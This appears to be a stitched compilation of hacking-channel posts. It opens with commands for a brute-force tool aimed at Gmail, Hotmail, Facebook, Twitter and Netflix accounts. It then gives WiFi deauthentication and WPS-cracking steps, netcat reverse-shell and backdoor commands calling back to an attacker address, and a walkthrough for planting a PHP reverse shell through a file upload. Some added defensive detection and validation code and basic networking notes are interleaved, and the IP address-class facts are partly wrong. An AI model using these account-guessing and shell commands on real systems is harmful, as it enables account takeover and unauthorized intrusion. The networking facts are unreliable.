UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 HACK GMAIL/netflix..... BRUTEFORCE ✅ :
T.me/UndercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/Matrix07ksa/Brute_Force.git

2) cd Brute_Force

3) sudo apt install python3 python3-pip

pip3 install proxylist

pip3 install mechanize

4) BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single

> BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single

> BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

> BruteForce Netflix Attack

Start On Vpn/proxies list > prevent blocking ...
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt


▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
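A defender's view of the password-list and proxy-list runs above, as an added example (not part of the original post or of the tool): because `-X proxy-list.txt` spreads guesses over many source addresses, a per-IP rate limit sees almost nothing, so this sketch counts failures per account in a sliding window. The log format, thresholds and function names are assumptions, and the events are constructed.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed look-back window
MAX_FAILURES = 5                # assumed per-account threshold

# Constructed sample events: "<timestamp> <account> <source ip> <result>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 alice 203.0.113.5 FAIL
2024-05-01T10:00:20 bob 198.51.100.7 FAIL
2024-05-01T10:00:40 alice 203.0.113.18 FAIL
2024-05-01T10:01:00 bob 198.51.100.7 FAIL
2024-05-01T10:01:10 alice 203.0.113.77 FAIL
2024-05-01T10:01:30 bob 198.51.100.7 OK
2024-05-01T10:01:50 alice 203.0.113.120 FAIL
2024-05-01T10:02:10 alice 203.0.113.201 FAIL
2024-05-01T10:02:40 alice 203.0.113.9 OK
"""

def parse(log):
    for line in log.splitlines():
        if line.strip():
            ts, account, ip, result = line.split()
            yield datetime.fromisoformat(ts), account, ip, result

def max_failures_per_ip(log):
    """What a per-IP rate limit sees: the worst single source address."""
    return max(Counter(ip for _, _, ip, r in parse(log) if r == "FAIL").values())

def detect_guessing(log, window=WINDOW, max_failures=MAX_FAILURES):
    """Alert per account, so rotating source addresses does not hide the run."""
    recent = defaultdict(deque)  # account -> (time, ip) of recent failures
    flagged, alerts = set(), []
    for ts, account, ip, result in parse(log):
        fails = recent[account]
        while fails and ts - fails[0][0] > window:
            fails.popleft()      # drop failures older than the window
        if result == "FAIL":
            fails.append((ts, ip))
            if len(fails) >= max_failures and account not in flagged:
                flagged.add(account)
                sources = len({src for _, src in fails})
                alerts.append((account, "guessing", sources))
        else:
            if account in flagged and fails:
                # a login that succeeds right after a guessing run
                alerts.append((account, "success_after_guessing", ip))
            fails.clear()
            flagged.discard(account)
    return alerts
```

In the sample, no single address fails more than twice, yet the account "alice" is flagged after five failures from five addresses, and the login that follows is reported for review.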
🦑 SMB server remote code execution vulnerability
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Intranet WSUS service: how does it work?



1) Applicable objects: All computers that have joined the intranet Active Directory domain, or have manually set up access to the intranet WSUS service (administrators can download the service configuration script)

2) For users in non-technical departments, the system can be set to automatically download and install the required security patches at regular intervals. Users only need to restart the computer as prompted.

3) For users in other departments, the system can be set to automatically download the required security patches and prompt installation, and users can follow the prompts to install and restart the system.

4) If you want to install the patch as soon as possible, the user can restart the computer once.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SMB server remote code execution vulnerability

> Microsoft Update Service

1) Applicable objects: All computers that cannot use the intranet WSUS service, including computers that do not have the intranet WSUS service enabled, and computers that have the intranet WSUS service enabled but are not connected to the intranet.

2) For computers that have not enabled the WSUS service on the intranet, users need to ensure that Windows automatic updates are enabled, follow the prompts to install patches and restart the computer.

3) For computers with the intranet WSUS service enabled but not connected to the intranet, users need to open the Start menu > All Programs > Windows Update, click "Check online for updates from Windows Update" and follow the prompts.

🦑 A computer can be assigned multiple IP addresses, and through a specific technology, multiple servers can share an IP address.

> Each interface in the Internet must have a unique IP address. Addresses are divided into five classes:

> Class A is reserved for the government and consists of a 1-byte network address and a 3-byte host address. The highest bit of the network address must be 0; the address range is 1.0.0.1 ~ 126.255.255.254

> Class B is for medium-sized companies: 2-byte network address, 2-byte host address. The highest bits of the network address must be 10; the address range is 128.0.0.1 ~ 223.255.255.254

> Class C is assigned to anyone who needs it. The highest bits must be 110; the address range is 192.0.0.1 ~ 239.255.255.254

> Class D is used for multicast. The first byte starts with 1110. It is a specially reserved address and does not point to a specific network.

> Class E is used for experiments.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ANY HACKER MUST KNOW THIS :
instagram.com/UndercodeTesting

1) Ports: in the hardware field, ports are interfaces. In the software field, a port generally refers to the communication protocol port for connection-oriented and connectionless services in the network. It is an abstract software structure, including some data structures and I/O buffers. The port here specifically refers to the logical port in TCP/IP.

2) Classification

Port distribution

> Well-known ports, 0-1023: tightly bound to some specific services; the port clearly indicates the protocol of a certain service, and its role cannot be redefined.

> Registered ports: used for many other purposes; different programs can define them as needed.

> Dynamic and / or private ports, 49152-65535: theoretically, common services should not be assigned to these ports. Easy to conceal.
Protocol type

> TCP port and UDP port, the two protocols are independent of each other, and the port number is also independent of

> TCP common ports:
FTP: file transfer protocol, port 21, download and upload files
Telnet: remote login port, can provide a communication service based on DOS mode, 23, the previous BBS
SMTP: simple mail transfer protocol, 25
POP3: corresponds to SMTP, used to receive mail; the POP3 protocol usually uses 110. As long as there is a corresponding program that uses the POP3 protocol, you can use the mailbox without logging in to the web interface and receive mail directly with a mail program.

> UDP commonly used ports:
HTTP: hypertext transfer protocol, open 80 to provide services on the computer that provides web page resources.

> DNS: used for domain name resolution services, domain name and IP conversion, 53
SNMP: Simple Network Management Protocol, 161, used to manage network equipment, because there are many network equipment, so connectionless services can show advantages.

> QQ: The program both accepts and provides services. The connectionless protocol is UDP. The QQ server uses 8000 to listen for incoming messages, and 4000 sends out text messages

> To view ports: you can use some tools to understand port usage. In Windows you can use Netstat to scan. Open ports are important.

🦑 Routing: The activity of moving information from a source location to a target location through a linked network. During the routing process, information will pass through at least one or more intermediate nodes.

> Router: The main node equipment of the Internet. The router determines the data forwarding through routing. The forwarding strategy is called routing. The interconnection hub of different networks, the router system has become the main context based on TCP / IP.

> Gateway: inter-network connector and protocol converter, the most complex network interconnection device, only used for the interconnection of two networks with different high-level protocols. The gateway can be used for WAN or local area network interconnection. Between systems that use different communication protocols, data formats or languages, or even completely different architectures, the gateway is a translator that connects the two networks.

Routing and gateway

> Gateway here refers to the gateway under the TCP/IP protocol suite. The gateway is essentially the IP address of one network leading to another network. If host A finds that the target of the data is not in the local network, it sends the data to its own gateway, which sends it to the gateway of B, and it is then forwarded to the host.

> Ping is only available when IP is installed. Sending data packets and receiving response information, the local host and the remote host must exchange a large number of data packets to trust the correctness of the IP.
// dos command learning
intrusion method
> Data-driven attacks, illegal use of system files, forged-information attacks, attacks against information protocol weaknesses, remote manipulation, retransmission attacks, attacks using system administrator errors, attacks on ICMP messages, attacks targeting original path option vulnerabilities, Ethernet broadcast attacks, hopping attacks, stealing TCP protocol links, and taking control of the system.

> System vulnerabilities refer to flaws in the logical design of application software or operating systems or errors in writing. Human reasons, objective reasons, hardware reasons
Information collection: the first step in collecting information is to obtain an IP address. If you are in a local area network, you need to obtain the DNS server
ping URL of the domain where the machine is located to obtain the website IP
nslookup DNS server
IP location query website IP138 whois in the domain where the machine is located can also find
vulnerabilities in the website registration information monitoring system.

> The scanner is a program that automatically detects security weaknesses in remote or local hosts. By using the scanner, users can discover, without leaving traces, the allocation of the various TCP ports of remote servers, the services provided and their software versions.
How it works: By selecting remote TCP / IP different port services and recording the answers given by the target, a lot of information about the target host is collected.

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
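A defender's use of the port ranges and the Netstat tip in the post above, as an added example (not from the original post): it parses constructed Windows `netstat -an` output, keeps listening TCP and bound UDP sockets, and labels each port by range so that listeners outside an expected set stand out. The expected-port set, function names and sample output are assumptions; 1024-49151 is the IANA registered range.

```python
# Constructed sample of Windows `netstat -an` output
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.1.30:50122     192.168.1.21:22        ESTABLISHED
  TCP    [::]:49664             [::]:0                 LISTENING
  UDP    0.0.0.0:161            *:*
"""

# Assumed baseline of listeners this host is supposed to have
EXPECTED = {("TCP", 135), ("TCP", 445), ("TCP", 49664)}

def port_range(port):
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"

def listeners(text):
    """Return (proto, port, range) for every listening/bound local socket."""
    found = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # header or unrelated line
        proto, local = fields[0], fields[1]
        # TCP rows carry a state column; UDP rows have none and are just bound
        if proto == "TCP" and (len(fields) < 4 or fields[3] != "LISTENING"):
            continue
        # rsplit keeps IPv6 literals such as [::]:49664 intact
        port = int(local.rsplit(":", 1)[1])
        found.append((proto, port, port_range(port)))
    return found

def unexpected(text, expected=EXPECTED):
    """Listeners that are not in the baseline and need an owner."""
    return [(p, n, r) for p, n, r in listeners(text) if (p, n) not in expected]
```

On the sample, the established outbound connection is ignored and two sockets are reported: TCP 4444 in the registered range and UDP 161 (SNMP) in the well-known range.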
🦑 Useful hacking tips
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 You can take three steps to protect your Android device :
t.me/undercodeTesting

1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.

2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase an application from a third-party store, use a mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. An example of a potentially dangerous sign is an application requesting permissions that allow it to disclose your identity or location or to send mail to the Internet.

3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is Hijacker?

> Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc. Hijacker provides a simple and easy-to-use UI, so users do not have to manually enter commands or copy and paste MAC addresses on the console.

> This application is only available for Android (ARM) and requires the device to have a wireless network card that supports Monitor Mode. Currently only a few devices are eligible, so you may need to use custom firmware.

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hack wifi steps

A) information collection

1. View available WiFi hotspots around, including hidden hotspots;
2. View specific network and client activities by analyzing signals and data packets;
3. Count hotspot confidence;
4. View manufacturer information of hotspot devices;
5. View device signal strength;
6. Save the captured data packet (.cap file);


B) Wireless attack

1. De-authenticate (drop) all clients of a specific / non-specific network;
2. De-authenticate (drop) specific clients;
3. Launch MDK3 beacon flood attacks with specific options;
4. Do MDK3 identity authentication DoS attacks against specific networks or users;
5. Capture WPA handshake packets and crack WEP networks;
6. Reaver WPS crack attacks;


C) other

1. Copy command or MAC address to clipboard;
2. Integrate dependent components without manual installation;
3. Integrate nexmon driver and related management components;
4. Use custom dictionary to crack .cap file;
5. Use parameters to filter wireless hotspots;
6. Export all collected information to files;

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Anti-malware tools: key features comparison

Tool | Pro trial period (d) | Menu languages | Real-time protection | Scheduling | Quarantine
Malwarebytes | 14 | 26 | ✔️ | ✔️ | ✔️
HitmanPro | 30 | 20 | ✔️ | ✔️ | ✔️
Emsisoft | 30 | 19 | ✔️ | ✔️ | ✔️
AVG | 30 | 22 | ✔️ | ✔️ | ✔️
Spybot Search & Destroy | N/A | 7 | ✘ | ✔️ | ✔️
Windows MSRT | N/A | 25 | ✘ | ✘ | ✘
iolo System Defense | 30 | 8 | ✔️ | ✔️ | ✔️
Zemana Antimalware | 30 | 41 | ✔️ | ✔️ | ✔️
Comodo Free Antivirus | N/A | 27 | ✔️ | ✘ | ✔️
Avast Free Antivirus | 60 | 1 | ✔️ | ✔️ | ✔️
GridinSoft Anti-Malware | N/A | 26 | ✔️ | ✔️ | ✔️
IObit Malware Fighter | 30 | 32 | ✔️ | ✘ | ✔️
Xvirus Anti-Malware | N/A | 14 | ✔️ | ✔️ | ✔️
STOPzilla | 15 | 2 | ✔️ | ✔️ | ✔️
Malware Killer | N/A | 1 | ✘ | ✘ | ✔️
Kaspersky Internet Security | 30 | 14 | ✔️ | ✔️ | ✔️
Trend Micro Internet Security | 30 | 20 | ✔️ | ✔️ | ✔️
Norton Security | 30 | 17 | ✔️ | ✔️ | ✔️
Total Defense Antivirus | 30 | 1 | ✔️ | ✔️ | ✔️
RogueKiller Anti-malware | N/A | 6 | ✘ | ✔️ | ✔️

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Penetration test tool tutorial: how to use Netcat (nc.exe). Netcat hands-on tutorial by undercode:

🦑 WHAT IS NETCAT (kali-parrot tool)?

Netcat is very simple and versatile at the same time; explaining it is like trying to explain everything you can do with a Swiss army knife.
To give some examples:

1) Get the banner

2) Bind the shell (backdoor)

3) Chat

4) File upload and download

5) Port scan

6) Port knocking

7) Port forwarding

8) Display web server HTTP file content

9) When you type nc -h in the terminal of Kali Linux, you will see that netcat has many options to enhance its functions and effects. Before diving into the details of how it works, note that here we use two systems, one as the attacker and the other as the target system.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to use netcat? Knocking port (port blasting)

1) Open a Kali Linux terminal and type the following command, which contains the IP and port number of the target.
nc 192.168.1.21 2222

2) When the command is executed, knocking on the port reveals the hidden running service; as can be seen from the image given below, port 2222 is open for SSH.

🦑 Reverse shell

1) This mainly means an attacker using netcat as a backdoor for unauthorized access to the target system, where the attacker activates a listening port (random port) when scanning any vulnerable targets.

2) nc -e /bin/bash 192.168.1.21 4444
The above command will wait for the reverse connection of the victim's system. In the given screenshot, you can see that the running website suffers from an OS command injection vulnerability. Now use nc -e /bin/bash 192.168.1.21 4444 to establish a connection between the victim and the attacker system, which allows backdoors to be created for unauthorized access.

🦑 Netcat as a backdoor:

Download netcat.exe for Windows and enter the following command

> nc.exe 192.168.1.21 4444 -e cmd.exe

> nc -lvp 4444

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
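Detection for the netcat command lines shown in the posts above, as an added example (not from the original posts): it flags process command lines where nc, ncat or netcat is started with `-e` (or ncat's `--exec` / `--sh-exec`), which wires a program to a socket, and separately notes listeners started with `-l`. The log format and matching rules are assumptions to adapt to your own process-creation telemetry, and the records are constructed.

```python
import re

NETCAT_NAMES = {"nc", "ncat", "netcat"}
EXEC_LONG = {"--exec", "--sh-exec"}   # ncat long options

# Constructed process-creation records: "<timestamp> <host> <command line>"
SAMPLE_LOG = r"""
2024-05-01T09:00:01 web01 nc -e /bin/bash 192.168.1.21 4444
2024-05-01T09:00:05 ws07 C:\Users\Public\nc.exe 192.168.1.21 4444 -e cmd.exe
2024-05-01T09:01:00 lab03 nc -lvp 4444
2024-05-01T09:02:00 web01 grep -e error /var/log/nc.log
2024-05-01T09:03:00 ops02 nc 192.168.1.21 2222
2024-05-01T09:04:00 web01 sh -c "ncat --exec /bin/sh 192.168.1.21 4444"
"""

def classify(cmdline):
    """Return 'exec-to-socket', 'listener' or None for one command line."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens):
        # basename of the token, for both / and \ path separators
        name = re.split(r"[\\/]", tok)[-1].lower()
        if name.endswith(".exe"):
            name = name[:-4]
        if name not in NETCAT_NAMES:
            continue
        args = tokens[i + 1:]
        # letters of bundled short options, e.g. "-lvp" -> "lvp"
        short = "".join(a[1:] for a in args if re.fullmatch(r"-[A-Za-z]+", a))
        if "e" in short or any(a.split("=")[0] in EXEC_LONG for a in args):
            return "exec-to-socket"   # a program's stdio is wired to the socket
        if "l" in short or "--listen" in args:
            return "listener"
    return None

def scan(log):
    """Return (host, verdict) for every record that matches."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        _, host, cmdline = line.split(None, 2)
        verdict = classify(cmdline)
        if verdict:
            hits.append((host, verdict))
    return hits
```

The `grep -e` record and the plain `nc 192.168.1.21 2222` connection are not reported, which shows why the rule keys on the netcat binary name together with the option rather than on `-e` alone.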

🦑 REVERSE SHELL & File upload exploitation
We will look at how an attacker can exploit a file upload vulnerability through the netcat shell. It is clear from the given images that the target web server allows its clients to upload images.
youtube.com/undercode

🦑 𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your Kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234

2) Now upload your php backdoor on the web server and execute the file connecting the victim's system from the attacker's machine.

3) You can then see that the attacker successfully gained unauthorized access through the netcat shell.

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
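The server-side check that stops the upload described in the post above, as an added example (not from the original post): an image-only upload handler should reject `php-reverse-shell.php` by extension, reject script content hidden behind an image name or image header, and store accepted files under a server-chosen name. The function name, allowlist and sample bytes are assumptions for illustration.

```python
import os
import secrets

# Allowed extension -> byte signatures the content must start with
IMAGE_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def validate_upload(filename, content):
    """Return (accepted, detail): the stored name, or the rejection reason."""
    # Ignore any client-supplied directory part, with either separator
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not allowed: %r" % ext
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match " + ext
    if b"<?php" in content.lower():
        return False, "embedded PHP code"
    # Never reuse the client's name: a random name with the validated
    # extension removes double extensions such as shell.php.png. The file
    # should also be stored where the web server does not execute scripts.
    return True, secrets.token_hex(16) + ext

# Constructed sample uploads (harmless placeholder bytes)
SAMPLES = [
    ("php-reverse-shell.php", b"<?php /* placeholder */ ?>"),
    ("shell.php.png", b"<?php /* placeholder */ ?>"),
    ("avatar.gif", b"GIF89a<?php /* placeholder */ ?>"),
    ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

def check_samples():
    """Return only the accept/reject decision for each sample, in order."""
    return [validate_upload(name, data)[0] for name, data in SAMPLES]
```

The content checks are a second line of defence; the controls that matter most are the server-chosen file name and a storage location that is never interpreted as PHP.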